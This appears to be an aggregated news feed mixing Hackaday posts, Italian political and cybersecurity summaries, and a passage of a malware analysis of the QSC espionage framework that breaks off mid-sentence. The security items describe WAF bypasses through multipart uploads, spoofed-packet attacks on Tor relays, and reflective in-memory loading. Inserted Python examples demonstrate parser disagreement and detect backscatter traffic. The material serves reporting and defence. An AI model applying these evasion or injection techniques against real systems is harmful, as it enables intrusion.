


This is Behind the Blog, where we share our behind-the-scenes thoughts about how a few of our top stories of the week came together. This week, we talk about the question "are people nutting to that?", doomscrolling on election night, and calls for Lysistrata 2024. #BehindTheBlog


The Rogue Emperor, And What To Do About Them



The chances are that if you know a former Apple employee, you'll have heard their Steve Jobs anecdote, and that it was rather unflattering to the Apple co-founder. I've certainly heard a few myself, and a quick web search will reveal plenty more. There are enough of them that it's very easy to conclude the guy was not a very pleasant person at all.

At the same time, he was a person whose public persona transcended reality, and his fan base treated him with an almost Messianic awe. For them everything he touched turned to gold, every new feature on an Apple product was his personal invention, every one of his actions even the not-so-clever ones were evidence of his genius, and anyone who hadn’t drunk the Apple Kool-Aid was anathema. You’ll still see echoes of this today in Apple fanboys, even though the shine on the company is perhaps now a little tarnished.

It’s easy to spot parallels to this story in some of today’s tech moguls who have gathered similar devotion, but it’s a phenomenon by no means limited to tech founders. Anywhere there is an organisation or group that is centred around an individual, from the smallest organisation upwards, it’s possible for it to enter an almost cult-like state in which the leader both accumulates too much power, and loses track of some of the responsibilities which go with it. If it’s a tech company or a bowls club we can shrug our shoulders and move to something else, but when it occurs in an open source project and a benevolent dictator figure goes rogue it has landed directly on our own doorstep as the open-source community. It’s happened several times that I can immediately think of and there are doubtless more cases I am unaware of, and every time I am left feeling that our community lacks an adequate mechanism to come through it unscathed.

In theory, the advantage of open-source software is that it provides choice. If something about a project offends you, you can switch to an alternative, or if you are a software developer you can simply fork it or write your own competitor. Both of those points are still trotted out by open source developers when they face criticism, yet both of them are increasingly fantastical. The scale of many large pieces of software means that there is an inevitable progression towards a single dominant project, and the days when all users of open source software were capable of writing it are long gone, if they ever existed at all. In many cases the reality of large open source projects is one of lock-in just as much as in the proprietary world; if you've put a lot of effort into adopting something then you're along for the ride, as the cost of changing your path is too significant to ignore.

So how can we as the open source community deal with a rogue emperor in a project we rely on? In some cases enough momentum can eventually gather to generate an alternative path; you will probably come up with the same examples I'm thinking of as I write this. But all too often either a loyal Praetorian Guard of developers protects their leader, or a firm grip on the non-open-source IP surrounding the ecosystem keeps the problematic figure in place despite all attempts to move forward. Perhaps it's time to consider the problem not after it happens, but before.

A central plank of the open source community lies in the licence. It sets down the framework under which the software can be used and shared, and there are a huge number of choices to reflect the varying ideals of software developers. It’s a great system in what it sets out to do, but I feel there’s an aspect of open source software it fails to address. Perhaps as well as considering how the IP is regulated, a licence should also commit the project to a system of governance, much in the manner that a country will have a constitution. If this constitution is written to maintain good governance and combat the threat of a rogue emperor it could only make for more stability, and since any code contributions would be made under its terms it would be very difficult for someone intent on breaking that governance structure to remove.

One thing is for sure, it’s becoming wearisome to find afresh every few months that a piece of software you use every day is associated with problematic people or behaviours. Something needs to be done, even if it’s not quite my suggestion here. What do you think? Tell us in the comments.


hackaday.com/2024/11/08/the-ro…



Hackaday Podcast Episode 295: Circuit Graver, Zinc Creep, and Video Tubes



With Superconference 2024 in the books, Dan joined Elliot, fresh off his flight back from Pasadena, to look through the week (or two) in hacks. It was a pretty good crop, too, despite all the distractions and diversions. We checked out the cutest little quadruped, a wireless antenna for wireless communications, a price-tag stand-in for paper calendars, and a neat way to test hardware and software together.

We take the closest look yet at why Arecibo collapsed, talk about Voyager’s recent channel-switching glitch, and find out how to put old Android phones back in action. There’s smear-free solder paste application, a Mims-worthy lap counter, and a PCB engraver that you’ve just got to see. We wrap things up with a look at Gentoo and pay homage to the TV tubes of years gone by — the ones in the camera, for the TV sets.

html5-player.libsyn.com/embed/…
Where to Follow Hackaday Podcast

Places to follow Hackaday podcasts:



Download the zero-calorie MP3.

Episode 295 Show Notes:

News:



What’s that Sound?


  • Fill in this form for your chance to win. Be specific!


Interesting Hacks of the Week:



Quick Hacks:


Can’t-Miss Articles:


hackaday.com/2024/11/08/hackad…



In this 1942 interview, Jung (yes, the psychoanalyst) says what I believe is everything there is to know to understand why Americans voted for Trump. It applies to any dictator.

Yesterday I was telling my therapist that, in my opinion, the people who voted for him are all those who would like to be like him: rich, powerful, surrounded by women, brazenly free to say and do whatever crosses their mind without suffering any consequences, or almost none. Free to be violent and nasty whenever and however they please.

Identification with the leader worked its magic, even when to an outside observer (the rest of the world, except for the other dictators and would-be dictators, not by coincidence) it is clear that this "leader" has no notable qualities and is not exceptional except in a negative sense.

We are utterly predictable, but we keep forgetting it. We keep not listening to those who try to remind us.

And so, if Trump won, it's because Trump is America, here and now.

Enjoy the read.

oldmagazinearticles.com/carl_j…

#Trump #USpol #ElezioniUSA

in reply to floreana

Maybe. A serious meditation on this, however, is deserved:
spoutible.com/thread/37794003
in reply to floreana

the "what if" only needs to be backed up by some action on the ground...

Do you know anyone who can make a move?

[we are rich in words, like Obama.
Poor in action... I say it without rancour, but in order to move forward]

Unknown parent

@Aladar
I don't know: we are still animals after all, and evidently, if someone appeals to the gut at its most basic, they succeed.

The question I ask myself is: how do you counter such a visceral force? What do you appeal to? Not rationality, I think; it is bound to be pulverised.

This is the question I would like to find an answer to. And I would like all the people, however few, who still conceive of politics as a service to the population to find it too.



It is time for Italy to officially adopt a National Security Strategy

@Notizie dall'Italia e dal mondo

[quote]The development of a National Security Strategy (Ssn), a document that conceptualises and summarises the country's approach to foreign policy, defence and security, is one of the steps Italy needs to take to structure its internal and external posture



The 2% for Defence dilemma. Between necessity and budget constraints, Italy seeks a solution

@Notizie dall'Italia e dal mondo

[quote]Faced with the geopolitical crises that characterise the current international scenario, investing in defence is perceived by most European governments, the Italian one included, as a necessity rather than a choice.

in reply to Pëtr Arkad'evič Stolypin

for the Americans who presumably proposed it, 2% of GDP even seems like little

reshared this



Fuzzy Skin Finish for 3D Prints, Now On Top Layers



[TenTech]’s Fuzzyficator brings fuzzy skin — a textured finish normally limited to sides of 3D prints — to the top layer with the help of some non-planar printing, no hardware modifications required. You can watch it in action in the video below, which also includes details on how to integrate this functionality into your favorite slicer software.
Little z-axis hops while laying down the top layer create a fuzzy skin texture.
Fuzzyficator essentially works by moving the print nozzle up and down while laying down a top layer, resulting in a textured finish that does a decent job of matching the fuzzy skin texture one can put on sides of a print. Instead of making small lateral movements while printing outside perimeters, the nozzle does little z-axis hops while printing the top.

Handily, Fuzzyficator works by being called as a post-processing script by the slicer (at this writing, PrusaSlicer, Orca Slicer, and Bambu Studio are tested) which also very conveniently reads the current slicer settings for fuzzy skin, in order to match them.

Non-planar 3D printing opens new doors but we haven’t seen it work like this before. There are a variety of ways to experiment with non-planar printing for those who like to tinker with their printers. But there’s work to be done that doesn’t involve hardware, too. Non-planar printing also requires new ways of thinking about slicing.

youtube.com/embed/85FJl5P0AoU?…


hackaday.com/2024/11/08/fuzzy-…



Microsoft Teams and OneDrive in the Hands of Hackers: The Invisible Threat of VEILDrive


A disturbing shadow is moving through corporate systems: the VEILDrive attack campaign is breaching Microsoft's cloud infrastructure, exploiting its own legitimate services to evade any attempt at detection. Microsoft Teams, SharePoint, Quick Assist and even OneDrive have ended up in the hands of cybercriminals, turned into powerful tools for spreading malware without raising suspicion.

The Israeli cybersecurity company Hunters, which discovered the operation in September 2024, has raised the alarm: VEILDrive represents a strategic threat to critical infrastructure, as shown by the attack on a large American organisation, identified as "Org C". Without revealing the victim's name, Hunters described a sophisticated attack, already under way in August, that culminated in the installation of Java-based malware designed to connect to the cybercriminals' command-and-control servers via OneDrive.

VEILDrive's secret weapon: a trusted infrastructure


How can such a sophisticated attack go unnoticed? The answer is as ingenious as it is frightening: VEILDrive exploits the trust that Microsoft SaaS services enjoy within corporate systems. These attackers did not create new tools and did not install unrecognised software: they used Microsoft's own services to establish a continuous, discreet and dangerously effective level of access.

In an unprecedented deception, VEILDrive sent messages via Teams to four employees of "Org C", impersonating IT staff and requesting remote access with Quick Assist. But the real ingenuity of the attack lies in the use of an already compromised account belonging to another company, "Org A". So, rather than raising suspicion with fake accounts, they used a previous victim's account to worm their way into the new network.

Microsoft Teams as the entry point for cybercriminals


The Achilles' heel exploited in this attack is a Microsoft Teams feature that allows direct communication between users of different organisations via "External Access". A seemingly harmless feature, but one that provided an opening for the attackers. Using one company's service to launch an attack against another company: an insidious compromise mechanism that shows how trust policies between platforms can be a double-edged sword.

Conclusion


While Microsoft's silence on this front leaves room for ever more troubling concerns, the VEILDrive campaign opens our eyes to a reality we can no longer ignore. No infrastructure, no cloud service, however trusted, can consider itself immune. The question is no longer "if" one will be hit, but "when" and with what degree of sophistication.

VEILDrive sends us a loud and clear signal: the era of guaranteed security is over. Companies must abandon any illusion of absolute protection and recognise that today even the most trusted services can be used against them.

The article Microsoft Teams and OneDrive in the Hands of Hackers: The Invisible Threat of VEILDrive comes from il blog della sicurezza informatica.



#Scuola, Minister Giuseppe Valditara travelled today to Emilia-Romagna to visit the Polo Tecnico Professionale in Lugo (RA), which was badly hit by the flood of May 2023.


Extreme Phishing: Cyber Criminals Exploit Government Emails to Request Personal Data


The FBI has issued a warning to US companies about a new scheme in which fraudsters use emergency data requests to steal personal information.

Using hacked email addresses of government agencies, the fraudsters ask private companies to urgently hand over confidential data supposedly needed for investigations. Companies, fearing for people's safety, often provide the data without carefully checking the requests. As a result, the criminals gain access to users' personal information, such as phone numbers, addresses and emails, which is then used for extortion or phishing.

According to the FBI, recent months have seen an increase in sales of compromised government accounts on underground forums. For example, in August 2024 a cybercriminal put up for sale access to .gov addresses for the purposes of espionage and extortion. The seller claimed to be able to help customers send emergency data requests and also provided forged documents for posing as law enforcement officers.

Such cases are not isolated. In March 2024, another criminal claimed to have access to government emails from more than 25 countries and to be willing to assist with data requests, including for email addresses and phone numbers. In December 2023, attempts were recorded to obtain data through fake requests accompanied by threats that non-compliance could even lead to death.

To improve corporate protection, the FBI recommends critically evaluating every emergency data request received, examining the documents for forgeries and inconsistencies in the legal codes cited. It is also important to thoroughly verify the sender at the slightest suspicion.

The measures proposed to improve security include:

  • using two-factor authentication;
  • implementing strict password management policies;
  • creating passwords of at least 16 characters with complex combinations of letters, numbers and special characters;
  • restricting access to corporate networks;
  • setting up network segmentation to prevent the spread of malware;
  • using tools to monitor suspicious activity.

Because of the increased threat, the FBI strongly advises organisations to review their incident response plans and update their security policies.

It is also important to maintain close contact with regional FBI offices for rapid information sharing and coordination of actions. To report suspicious incidents and criminal activity, the FBI recommends reporting via ic3.gov or the nearest field office.

The article Extreme Phishing: Cyber Criminals Exploit Government Emails to Request Personal Data comes from il blog della sicurezza informatica.



When Donald Trump won in 2016, we weren't sure if good journalism mattered anymore. Now, we're more sure than ever it does. #DonaldTrump #Announcements #politics



This Week in Security: Linux VMs, Real AI CVEs, and Backscatter TOR DoS



Steve Ballmer famously called Linux “viral”, with some not-entirely coherent complaints about the OS. In a hilarious instance of life imitating art, Windows machines are now getting attacked through malicious Linux VM images distributed through phishing emails.

This approach seems to be intended to fool any anti-malware software that may be running. The VM includes the chisel tool, described as "a fast TCP/UDP tunnel, transported over HTTP, secured via SSH". Now that's an interesting protocol stack. It's an obvious advantage for an attacker to have a Linux VM right on a target network. As this sort of virtualization does require hardware virtualization support, it might be worth disabling the virtualization extensions in the BIOS on machines that don't need them.

AI Finds Real CVE


We’ve talked about some rather unfortunate use of AI, where aspiring security researchers asked an LLM to find vulnerabilities in a project like curl, and then completely wasted a maintainer’s time on those bogus reports. We happened to interview Daniel Stenberg on FLOSS Weekly this week, and after he recounted this story, we mused that there might be a real opportunity to use LLMs to find vulnerabilities, when used as a way to direct fuzzing, and when combined with a good test suite.

And now, we have Google Project Zero bringing news of their Big Sleep LLM project finding a real-world vulnerability in SQLite. This tool was previously called Project Naptime, and while it’s not strictly a fuzzer, it does share some similarities. The main one being that both tools take their educated guesses and run that data through the real program code, to positively verify that there is a problem. With this proof of concept demonstrated, it’s sure to be replicated. It seems inevitable that someone will next try to get an LLM to not only find the vulnerability, but also find an appropriate fix.

Slipping Between Parsers


Something else interesting from our conversation with Daniel was the trurl tool, that makes the curl url parser available as a standalone tool. The point being that there are often security problems that arise from handling URLs and other user-provided data with different parsers. And that’s the story [Andrea Menin] has to tell, taking a look at how file parsers handle file uploads a bit differently.

More specifically, Web Application Firewalls (WAFs) check a handful of metrics on file uploads, like the file extension, MIME Type, the “magic” first few bytes of the file, file size, filename sanitization, and more. This gets complicated when an application uses multipart/form-data. Files and parameters get chunked, separated by boundary delimiter strings.

So one trick is to hide strings that the WAF would normally block by sneaking them inside a multipart upload. Another trick is to use the same name field multiple times. The WAF may ignore the repeated names, and the application itself may not ignore the repetition in the same way. There are many more, from inconsistent quoting, to omitting an expected carriage return in the upload, to failing to mention that your filename contains non-ASCII (UTF-8) characters.
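To make the parser-differential concrete, here is an added example (not code from the article or from [Andrea Menin]'s research): a deliberately lenient multipart/form-data parser whose "first wins" and "last wins" modes stand in for a WAF and an application that disagree about a repeated field name, beside a strict check a defender can run before either parser to reject the ambiguous constructs the text lists (duplicate names, bare LF line endings, unbalanced quotes, non-ASCII headers, missing closing delimiter). The boundary and bodies are constructed for the example.

```python
import re

BOUNDARY = "----FormBoundaryExample"  # constructed boundary string

# Match name="..." but not the "name=" inside filename="..."
NAME_RE = re.compile(r'(?<!\w)name="([^"]*)"')


def _parts(body, delim):
    """Yield (header_block, data) for each part between boundary delimiters."""
    for chunk in body.split(delim)[1:]:
        if chunk.startswith("--"):      # closing delimiter reached
            return
        head, _, data = chunk.lstrip("\r\n").partition("\r\n\r\n")
        yield head, data.rstrip("\r\n")


def parse_multipart(body, boundary, keep="last"):
    """Lenient parser in the style of many frameworks: `keep` decides whether
    the first or the last part carrying a repeated field name wins."""
    parts = {}
    for head, data in _parts(body, "--" + boundary):
        name = NAME_RE.search(head)
        if not name:
            continue
        if keep == "first" and name.group(1) in parts:
            continue
        fn = re.search(r'filename="([^"]*)"', head)
        parts[name.group(1)] = {"filename": fn.group(1) if fn else None,
                                "data": data}
    return parts


def strict_check(body, boundary):
    """Defender-side gate: list the constructs that make parsers disagree.
    An empty list means the body is unambiguous enough to pass on."""
    findings = []
    delim = "--" + boundary
    if "\n" in body.replace("\r\n", ""):
        findings.append("bare LF line ending")
    if not body.rstrip("\r\n").endswith(delim + "--"):
        findings.append("missing closing delimiter")
    seen = set()
    for head, _ in _parts(body, delim):
        disp = next((h for h in head.split("\r\n")
                     if h.lower().startswith("content-disposition:")), "")
        if disp.count('"') % 2:
            findings.append("unbalanced quotes in Content-Disposition")
        if not disp.isascii():
            findings.append("non-ASCII characters in Content-Disposition")
        name = NAME_RE.search(disp)
        if name:
            if name.group(1) in seen:
                findings.append(f"duplicate field name {name.group(1)!r}")
            seen.add(name.group(1))
    return findings


def _part(name, filename, data):
    """Build one constructed file part with CRLF line endings."""
    return (f"--{BOUNDARY}\r\n"
            f'Content-Disposition: form-data; name="{name}"; filename="{filename}"\r\n'
            "Content-Type: text/plain\r\n\r\n" + data + "\r\n")


# Constructed sample bodies: one clean upload, one reusing the field name "file"
SAMPLE_CLEAN = _part("file", "notes.txt", "hello") + f"--{BOUNDARY}--\r\n"
SAMPLE_DUP = (_part("file", "notes.txt", "hello")
              + _part("file", "notes.html", "<b>hi</b>")
              + f"--{BOUNDARY}--\r\n")

if __name__ == "__main__":
    # A "first wins" inspector sees notes.txt; a "last wins" app sees notes.html.
    print(parse_multipart(SAMPLE_DUP, BOUNDARY, keep="first")["file"]["filename"])
    print(parse_multipart(SAMPLE_DUP, BOUNDARY, keep="last")["file"]["filename"])
    print(strict_check(SAMPLE_DUP, BOUNDARY))
```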

Backscatter TOR DoS


[delroth] got a nasty surprise. He got an abuse@ email, letting him know that one of his server VMs was sending SSH probes around the Internet. Unless you’re SSH scanning on purpose, that’s not a good surprise. That’s bad for two reasons. First off, it really implies that your server has been compromised. And second, it’s going to put your IP on multiple spam and abuse blacklists.

The natural response was to start looking for malware. The likely culprits were a Syncthing relay, a Mastodon instance, a Tor relay, and a Matrix server. The odd thing was that none of those services showed signs of compromise. The breakthrough came when [delroth] started looking closely at port 22 traffic captured by a running tcpdump. No outgoing packets were being captured, but TCP reset packets were coming in.

And really, that’s the whole trick: Send bogus SSH packets from a spoofed IP address, to a bunch of servers around the Internet, and some of them will generate complaints. Anyone can generate raw packets with spoofed IP addresses. The catch is that not everyone can successfully send that traffic, since many ISPs do BCP38 scrubbing, where “impossible” traffic gets dropped. This traffic was impossible, since those source IPs were coming from the wrong network.

The only real question is “why?” The answer seems to be TOR. While [delroth] does run a TOR node, it’s not an exit node, which is usually enough to keep the IP out of trouble. While TOR does make some guarantees about traffic anonymity, it doesn’t make any guarantees about hiding the IPs of network nodes. And it seems that it’s recently become someone’s hobby to trigger exactly these attacks on TOR nodes.
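The tcpdump observation above is the whole detection: replies arriving for connections the host never opened. As an added example (not [delroth]'s own tooling), this script parses constructed tcpdump-style lines and flags inbound RST or SYN-ACK segments that have no matching outbound SYN, counting distinct remote hosts so that one confused peer is not mistaken for a spoofing campaign. The addresses, ports and threshold are constructed for the example.

```python
import re
from collections import Counter

# Constructed tcpdump-style lines (not the real capture). 192.0.2.10 is the
# monitored host; the two 198.51.100.5 lines are a legitimate outbound SSH
# handshake, the rest are replies to SYNs this host never sent.
SAMPLE_CAPTURE = """\
12:00:01.000000 IP 203.0.113.7.22 > 192.0.2.10.40001: Flags [R.], seq 0, ack 1, win 0, length 0
12:00:01.100000 IP 192.0.2.10.51000 > 198.51.100.5.22: Flags [S], seq 100, win 64240, length 0
12:00:01.200000 IP 198.51.100.5.22 > 192.0.2.10.51000: Flags [S.], seq 200, ack 101, win 65160, length 0
12:00:01.300000 IP 203.0.113.9.22 > 192.0.2.10.40002: Flags [S.], seq 300, ack 1, win 65160, length 0
12:00:01.400000 IP 203.0.113.11.22 > 192.0.2.10.40003: Flags [R], seq 0, win 0, length 0
12:00:01.500000 IP 203.0.113.7.22 > 192.0.2.10.40004: Flags [R.], seq 0, ack 1, win 0, length 0
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)


def parse_line(line):
    """Return a dict with src/sport/dst/dport/flags, or None for non-TCP lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    pkt = m.groupdict()
    pkt["sport"] = int(pkt["sport"])
    pkt["dport"] = int(pkt["dport"])
    return pkt


def find_backscatter(capture, local_ip):
    """Count, per remote IP, inbound RST or SYN-ACK segments that do not belong
    to a connection this host opened (no earlier outbound SYN to that tuple)."""
    opened = set()          # (remote_ip, remote_port, local_port) of SYNs we sent
    suspects = Counter()
    for line in capture.splitlines():
        pkt = parse_line(line)
        if pkt is None:
            continue
        flags = pkt["flags"]
        if pkt["src"] == local_ip and flags == "S":
            opened.add((pkt["dst"], pkt["dport"], pkt["sport"]))
        elif pkt["dst"] == local_ip and ("R" in flags or flags == "S."):
            if (pkt["src"], pkt["sport"], pkt["dport"]) not in opened:
                suspects[pkt["src"]] += 1
    return suspects


def looks_like_spoofing_campaign(suspects, min_remotes=3):
    """Many distinct hosts answering connections we never opened is the
    signature of someone spoofing our address; a single stray RST is not."""
    return len(suspects) >= min_remotes


if __name__ == "__main__":
    hits = find_backscatter(SAMPLE_CAPTURE, "192.0.2.10")
    for ip, n in hits.most_common():
        print(f"{ip}: {n} unsolicited reply segment(s)")
    print("spoofing campaign suspected:", looks_like_spoofing_campaign(hits))
```

Feed it real output from `tcpdump -n -l tcp port 22` and the absence of any outbound SYN in `opened` for the flagged tuples is exactly what separates backscatter from a compromised host that really is scanning.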

Bits and Bytes


A pair of developers have started working on hardening for the PHP language and server components. That means adding back safe-unlink, doing memory isolation to make heap spraying harder, and removing trivial ways to get powerful exploitation primitives. PHP may not be the cool kid on the block any more, but it's still very widely used, and making exploitation just a bit harder is a clear win.

Cisco’s Unified Industrial Wireless Software had a trivial command injection attack allowing for arbitrary command execution as root. This was limited to devices running with Ultra-Reliable Wireless Backhaul mode turned on. So far this flaw hasn’t been found in real attacks, but such a flaw in industrial equipment isn’t great.

And finally, Electronic Arts had an improperly secured web API endpoint, and [Sean Kahler] found it and started looking around. It turns out that API included a swagger json, which documents the entire API. Score! In the end, the API allowed for moving a “persona” from one account to another, and that eventually allows for full account takeover. Yikes.


hackaday.com/2024/11/08/this-w…




Clusit Report 2024, cyber attacks in Italy: manufacturing and healthcare the hardest-hit sectors


@Informatica (Italy e non Italy 😁)
The sectors most critically affected by attacks in 2023 were finance/insurance and manufacturing. But healthcare is also increasingly targeted, with attacks up more than 80% in Italy. How to prepare for the



The EDPB's doubts about the Data Privacy Framework: many questions still open


@Informatica (Italy e non Italy 😁)
The European Data Protection Board has published the first review report on the Data Privacy Framework (DPF): according to the EDPB, the measures implemented by the DPF, although an improvement, leave open significant questions about the real equivalence of the



Between fake news and phone tapping: China's shadow over the US elections


@Informatica (Italy e non Italy 😁)
The 47th President of the United States of America has been elected: Donald Trump returns to govern one of the world's major powers, but from the standpoint of security and information, how did we get to Election Day? What we know and the



Strengthening digital resilience: generative AI in the service of the DORA regulation


@Informatica (Italy e non Italy 😁)
The DORA Regulation represents a significant step towards strengthening operational resilience in the financial sector. In this sense, generative AI is emerging as a powerful ally in this process, offering



Fake phishing invoices: how criminals exploit DocuSign's electronic signature


@Informatica (Italy e non Italy 😁)
A sophisticated phishing campaign has been identified in which fraudsters exploit the trust placed in the legitimacy of the DocuSign electronic signature service to bypass spam filters and deceive victims with the aim



Meta and facial recognition of celebrities to counter scams


@Informatica (Italy e non Italy 😁)
Celebrities increasingly find themselves unwittingly used as vehicles for scams. Their image is exploited to ensnare users, and Meta is trying to play its ace with facial recognition. The idea may be a good one, but it is not without limits
The article Meta and facial recognition of celebrities to



ToxicPanda defrauds Android users with fraudulent money transfers: how to protect yourself


@Informatica (Italy e non Italy 😁)
ToxicPanda's main goal is to initiate money transfers from compromised Android devices via account takeover (ATO), exploiting the on-device fraud (ODF) technique. Here is



NIS2, the ENISA guidelines for implementation in companies: the key points


@Informatica (Italy e non Italy 😁)
ENISA has launched the public consultation on its practical guide to cybersecurity for European organisations under the NIS2 directive. An important document on which those organisations will be able to build their compliance plan



Anti-spy decree, Mantovano: "In the Council of Ministers within days"


@Informatica (Italy e non Italy 😁)
The anti-spy decree is almost ready. This was announced by the Undersecretary to the Presidency of the Council of Ministers, Alfredo Mantovano, during the press conference on the launch of a national action plan to protect Italian universities and research from foreign interference, held yesterday at Palazzo Chigi. At the



Trust in cyber security comes through transparency: the role of suppliers


@Informatica (Italy e non Italy 😁)
The more transparent an organisation is, in its processes as in its culture, the higher the probability that it is rigorous in its production processes. Transparency is a fundamental element, since it helps build trust between



NIS2, the ENISA guidelines for implementation in companies: the key points


ENISA has launched the public consultation on its practical guide to cybersecurity for European organisations under the NIS2 directive. An important document on which those organisations will be able to build their regulatory compliance plan. Here are the key points

The article NIS2, the ENISA guidelines for implementation in companies: the key points comes from Cyber Security 360.



Trust in cyber security comes through transparency: the role of suppliers


The more transparent an organisation is, in its processes as in its culture, the higher the probability that it is rigorous in its production processes. Transparency is a fundamental element, since it helps build trust between manufacturers, customers and partners. And this is even more true in relation to cyber security

The article Trust in cyber security comes through transparency: the role of suppliers comes from Cyber Security 360.



Clusit Report 2024, cyber attacks in Italy: manufacturing and healthcare the hardest-hit sectors


The sectors most critically affected by attacks in 2023 were finance/insurance and manufacturing. But healthcare is also increasingly targeted, with attacks up more than 80% in Italy. How to prepare for the future, after the entry into force of DORA and the other regulations

The article Clusit Report 2024, cyber attacks in Italy: manufacturing and healthcare the hardest-hit sectors comes from Cyber Security 360.



Strengthening digital resilience: generative AI in the service of the DORA regulation


The DORA Regulation represents a significant step towards strengthening operational resilience in the financial sector. In this sense, generative AI is emerging as a powerful ally in this process, offering innovative tools and solutions to address the challenges posed by digital resilience

The article Strengthening digital resilience: generative AI in the service of the DORA regulation comes from Cyber Security 360.



Between fake news and phone tapping: China's shadow over the US elections


The 47th President of the United States of America has been elected: Donald Trump returns to govern one of the world's major powers, but from the standpoint of security and information, how did we get to Election Day? What we know, and China's role in the disinformation campaign

The article Between fake news and phone tapping: China's shadow over the US elections comes from Cyber Security 360.



The EDPB's doubts about the Data Privacy Framework: many questions still open


The European Data Protection Board has published the first review report on the Data Privacy Framework (DPF): according to the EDPB, the measures implemented by the DPF, although an improvement, leave open significant questions about the real equivalence of the guarantees offered compared with the European ones. Here is which

The article The EDPB's doubts about the Data Privacy Framework: many questions still open comes from Cyber Security 360.



Meta and facial recognition of celebrities to counter scams


Celebrities increasingly find themselves unwittingly used as vehicles for scams. Their image is exploited to ensnare users, and Meta is trying to play its ace with facial recognition. The idea may be a good one, but it is not without limits

The article Meta and facial recognition of celebrities to counter scams comes from Cyber Security 360.



"Intesa San Paolo must immediately notify the spied-on account holders": what the Privacy Guarantor's move teaches us


The Privacy Guarantor has given Intesa San Paolo 20 days to inform the customers who suffered the data breach caused by the improper access of one of its own employees. The bank is playing it down, but behind it lies a huge problem; here is why

The article "Intesa San Paolo must immediately notify the spied-on account holders": what the Privacy Guarantor's move teaches us comes from Cyber Security 360.



Fake phishing invoices: how criminals exploit DocuSign's electronic signature


A sophisticated phishing campaign has been identified in which fraudsters exploit the trust placed in the legitimacy of the DocuSign electronic signature service to bypass spam filters and deceive victims with the aim of obtaining fraudulent payments. Here are all the details and how to defend yourself

The article Fake phishing invoices: how criminals exploit DocuSign's electronic signature comes from Cyber Security 360.



ToxicPanda defrauds Android users with fraudulent money transfers: how to protect yourself


ToxicPanda's main goal is to initiate money transfers from compromised Android devices via account takeover (ATO), exploiting the on-device fraud (ODF) technique. Here is how to mitigate the risk

The article ToxicPanda defrauds Android users with fraudulent money transfers: how to protect yourself comes from Cyber Security 360.



Leonardo grows in the third quarter. International collaborations rewarded too

@Notizie dall'Italia e dal mondo

Faced with the growing demand for security, linked to the international geopolitical context, demand for systems has also grown, generating positive prospects for the Defence sector. This emerges from the results of the third



Ask Hackaday: How Much Would You Stake On An Online Retailer



On the bench where this is being written, there’s a Mitutoyo vernier caliper. It’s the base model with a proper vernier scale, but it’s beautifully made, and it’s enjoyable to see younger hardware hackers puzzle over how to use it. It cost about thirty British pounds a few years ago, but when it comes to quality metrology instruments that’s really cheap. The sky really is the limit for those in search of ultimate accuracy and precision. We can see then why this Redditor was upset when the $400 Mitutoyo they ordered from Amazon turned out to be nothing of the sort. We can’t even call it a fake; it’s just a very cheap instrument stuffed, oddly, into a genuine Mitutoyo box.

Naturally we hope they received a refund, but it does raise a question about buying from large online retailers: how much are we prepared to risk? We buy plenty of stuff from AliExpress in our community, but in that case the slight element of chance which comes with random Chinese manufacture is offset by the low prices. Meanwhile the likes of Amazon have worked hard to establish themselves as trusted brands, but is that trust misplaced? They are, after all, simply clearing houses for third-party products, and evidently have little care for what’s in the box. The £30 base model caliper mentioned above is an acceptable punt, but at what point should we go to a specialist and pay more for some confidence in the product?

It’s a question worth pondering as we hit the “Buy now” button without thinking. What’s your view? Let us know in the comments. Meanwhile, any of us can be caught out by an online purchase.

Thanks [JohnU] for the tip.


hackaday.com/2024/11/08/ask-ha…





Time to Move Beyond Network Fees and Focus on Real Digital Growth [Promoted content]


Will Virkkunen finally put to rest the network fees ideas to focus on what really matters for the Internet ecosystem and EU citizens? Information Labs’ research certainly points in that direction.


euractiv.com/section/digital/o…



I have always taken it for granted that there is someone who simply pursues their own interests and spreads disinformation. And it will always be that way anyway. It's a bit like the reply "I can resist everything except temptation". It is the citizens' responsibility to inform themselves and to be capable of taking a responsible position. It is a burden that falls on citizens in a democracy. At most we can find, as co-responsible, a deliberate destruction of culture and information by those in power. But I will not argue that it is all the fault of the powers that be, nor of the charlatans who spread disinformation, who are often truly, incredibly unconvincing. In a free regime the only real responsibility of the citizen is to tell news from hoaxes. Nothing else. And passing the buck means holding the "powers that be" or whoever spreads disinformation solely responsible. It will always exist. Unless we have government censorship, which is even worse. One has to be pragmatic in life and stop thinking that those around us must necessarily be honest. Obviously fighting the hoaxers should be done, but hoaxes will never stop existing as long as they benefit someone. And there will always be an interest. I laugh at the "citizens" when they complain about those who govern, and then they cannot separate plastic from paper... we have all fallen for some hoax... it only takes a moment... a distraction... but this does not exempt us from taking on our responsibilities. It has happened to me that I shared some fake news. But whose fault is it? Mine. I didn't check properly beforehand. It's not a matter of blaming someone but of taking responsibility for EVERY one of one's own actions.


QSC: A multi-plugin framework used by CloudComputating group in cyberespionage campaigns



Introduction


In 2021, we began to investigate an attack on the telecom industry in South Asia. During the investigation, we discovered QSC: a multi-plugin malware framework that loads and runs plugins (modules) in memory. The framework includes a Loader, a Core module, a Network module, a Command Shell module and a File Manager module. It is dropped either as a standalone executable or as a payload file along with a loader DLL. In this post, we describe each component of the framework as well as its recent activity including a deployment scenario, an additional backdoor, post-compromise activity and a link to the CloudComputating group.

QSC framework components

The Loader


The Loader implant is a service DLL with the internal name loader.dll. It contains the string “E:\project\test\qt\bin\module\loader\x64\release\loader.pdb” as its PDB path. The Loader is configured either to read code from <systemdir>\drivers\msnet or to read 0x100 (256) bytes from n_600s.sys, located in the same directory as the module, to obtain the path of the file containing the code. If it reads the file path from n_600s.sys, it deletes that file afterwards. The Loader then reads and decompresses the code from the provided file path, reflectively injects the decompressed code into memory and calls the exported method plugin_working. The code injected by the Loader is the Core module, which is described below.

The Core and Network modules


The Core module has the internal name qscmdll.dll and exports only one method, named plugin_working. It contains the string “E:\project\test\qt\bin\module\qscmdll\x64\release\qscmdll.pdb” as its PDB path. The Loader passes the path of the file containing the compressed Network module code as one of the parameters to the Core module.

The Core module reads the Network module from that file path, decompresses it and injects it into memory. The Network module is a 64-bit DLL with the internal name qscnetwork.dll. It contains the string “E:\project\test\qt\bin\module\qscnetwork\x64\release\qscnetwork.pdb” as its PDB path and exports the methods setConfig, checkTarget and getNetWork. After injecting the Network module into memory, the Core module initializes it by calling its exported methods in sequence:

